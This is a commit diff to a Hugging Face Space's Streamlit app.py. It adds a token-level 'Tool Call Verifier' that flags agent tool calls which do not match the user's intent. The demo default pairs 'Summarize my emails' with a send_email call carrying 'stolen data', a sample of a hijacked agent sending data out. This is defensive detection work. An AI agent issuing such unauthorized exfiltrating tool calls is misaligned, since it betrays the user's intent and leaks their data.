Spaces:
Running
Running
bitliu
commited on
Commit
·
5f5c5b7
1
Parent(s):
1ba6507
update
Browse filesSigned-off-by: bitliu <[email protected]>
app.py
CHANGED
|
@@ -100,9 +100,12 @@ MODELS = {
|
|
| 100 |
"🔍 Tool Call Verifier": {
|
| 101 |
"id": "llm-semantic-router/toolcall-verifier",
|
| 102 |
"description": "Token-level verification of tool calls to detect unauthorized actions. Stage 2 defense for tool-calling agents.",
|
| 103 |
-
"type": "
|
| 104 |
"labels": None,
|
| 105 |
-
"demo":
|
|
|
|
|
|
|
|
|
|
| 106 |
},
|
| 107 |
}
|
| 108 |
|
|
@@ -239,6 +242,36 @@ def classify_tokens_simple(text: str, model_id: str) -> list:
|
|
| 239 |
return entities
|
| 240 |
|
| 241 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 242 |
def create_highlighted_html(text: str, entities: list) -> str:
|
| 243 |
"""Create HTML with highlighted entities."""
|
| 244 |
if not entities:
|
|
@@ -335,7 +368,22 @@ def main():
|
|
| 335 |
value=demo["followup"],
|
| 336 |
placeholder="Enter the user's follow-up message...",
|
| 337 |
)
|
| 338 |
-
text_input =
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 339 |
else:
|
| 340 |
# Standard text input for other models
|
| 341 |
text_input = st.text_area(
|
|
@@ -344,7 +392,7 @@ def main():
|
|
| 344 |
height=120,
|
| 345 |
placeholder="Type your text here...",
|
| 346 |
)
|
| 347 |
-
query_input = response_input = followup_input = None
|
| 348 |
|
| 349 |
st.markdown("---")
|
| 350 |
|
|
@@ -378,6 +426,23 @@ def main():
|
|
| 378 |
"followup": followup_input,
|
| 379 |
},
|
| 380 |
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 381 |
elif not text_input.strip():
|
| 382 |
st.warning("Please enter some text to analyze.")
|
| 383 |
else:
|
|
|
|
| 100 |
"🔍 Tool Call Verifier": {
|
| 101 |
"id": "llm-semantic-router/toolcall-verifier",
|
| 102 |
"description": "Token-level verification of tool calls to detect unauthorized actions. Stage 2 defense for tool-calling agents.",
|
| 103 |
+
"type": "toolcall_verifier",
|
| 104 |
"labels": None,
|
| 105 |
+
"demo": {
|
| 106 |
+
"user_intent": "Summarize my emails",
|
| 107 |
+
"tool_call": '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}',
|
| 108 |
+
},
|
| 109 |
},
|
| 110 |
}
|
| 111 |
|
|
|
|
| 242 |
return entities
|
| 243 |
|
| 244 |
|
| 245 |
+
def classify_toolcall_verifier(
|
| 246 |
+
user_intent: str, tool_call: str, model_id: str
|
| 247 |
+
) -> tuple:
|
| 248 |
+
"""Classify tool call verification with special format."""
|
| 249 |
+
tokenizer, model = load_model(model_id, "token")
|
| 250 |
+
id2label = model.config.id2label
|
| 251 |
+
|
| 252 |
+
# Format input as per model requirements
|
| 253 |
+
input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
|
| 254 |
+
|
| 255 |
+
inputs = tokenizer(
|
| 256 |
+
input_text, return_tensors="pt", truncation=True, max_length=2048
|
| 257 |
+
)
|
| 258 |
+
|
| 259 |
+
with torch.no_grad():
|
| 260 |
+
outputs = model(**inputs)
|
| 261 |
+
predictions = torch.argmax(outputs.logits, dim=-1)[0].tolist()
|
| 262 |
+
|
| 263 |
+
# Get tokens and labels
|
| 264 |
+
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
|
| 265 |
+
labels = [id2label[pred] for pred in predictions]
|
| 266 |
+
|
| 267 |
+
# Find unauthorized tokens
|
| 268 |
+
unauthorized_tokens = [
|
| 269 |
+
(tokens[i], labels[i]) for i in range(len(tokens)) if labels[i] == "UNAUTHORIZED"
|
| 270 |
+
]
|
| 271 |
+
|
| 272 |
+
return input_text, tokens, labels, unauthorized_tokens
|
| 273 |
+
|
| 274 |
+
|
| 275 |
def create_highlighted_html(text: str, entities: list) -> str:
|
| 276 |
"""Create HTML with highlighted entities."""
|
| 277 |
if not entities:
|
|
|
|
| 368 |
value=demo["followup"],
|
| 369 |
placeholder="Enter the user's follow-up message...",
|
| 370 |
)
|
| 371 |
+
text_input = user_intent_input = tool_call_input = None
|
| 372 |
+
elif model_config["type"] == "toolcall_verifier":
|
| 373 |
+
# Tool call verifier needs user intent and tool call
|
| 374 |
+
demo = model_config["demo"]
|
| 375 |
+
user_intent_input = st.text_input(
|
| 376 |
+
"👤 User Intent:",
|
| 377 |
+
value=demo["user_intent"],
|
| 378 |
+
placeholder="Enter the user's original intent...",
|
| 379 |
+
)
|
| 380 |
+
tool_call_input = st.text_area(
|
| 381 |
+
"🔧 Tool Call JSON:",
|
| 382 |
+
value=demo["tool_call"],
|
| 383 |
+
height=120,
|
| 384 |
+
placeholder="Enter the tool call JSON to verify...",
|
| 385 |
+
)
|
| 386 |
+
text_input = query_input = response_input = followup_input = None
|
| 387 |
else:
|
| 388 |
# Standard text input for other models
|
| 389 |
text_input = st.text_area(
|
|
|
|
| 392 |
height=120,
|
| 393 |
placeholder="Type your text here...",
|
| 394 |
)
|
| 395 |
+
query_input = response_input = followup_input = user_intent_input = tool_call_input = None
|
| 396 |
|
| 397 |
st.markdown("---")
|
| 398 |
|
|
|
|
| 426 |
"followup": followup_input,
|
| 427 |
},
|
| 428 |
}
|
| 429 |
+
elif model_config["type"] == "toolcall_verifier":
|
| 430 |
+
if not user_intent_input.strip() or not tool_call_input.strip():
|
| 431 |
+
st.warning("Please fill in both user intent and tool call fields.")
|
| 432 |
+
else:
|
| 433 |
+
with st.spinner("Analyzing..."):
|
| 434 |
+
input_text, tokens, labels, unauthorized = classify_toolcall_verifier(
|
| 435 |
+
user_intent_input, tool_call_input, model_config["id"]
|
| 436 |
+
)
|
| 437 |
+
st.session_state.result = {
|
| 438 |
+
"type": "toolcall_verifier",
|
| 439 |
+
"input_text": input_text,
|
| 440 |
+
"tokens": tokens,
|
| 441 |
+
"labels": labels,
|
| 442 |
+
"unauthorized": unauthorized,
|
| 443 |
+
"user_intent": user_intent_input,
|
| 444 |
+
"tool_call": tool_call_input,
|
| 445 |
+
}
|
| 446 |
elif not text_input.strip():
|
| 447 |
st.warning("Please enter some text to analyze.")
|
| 448 |
else:
|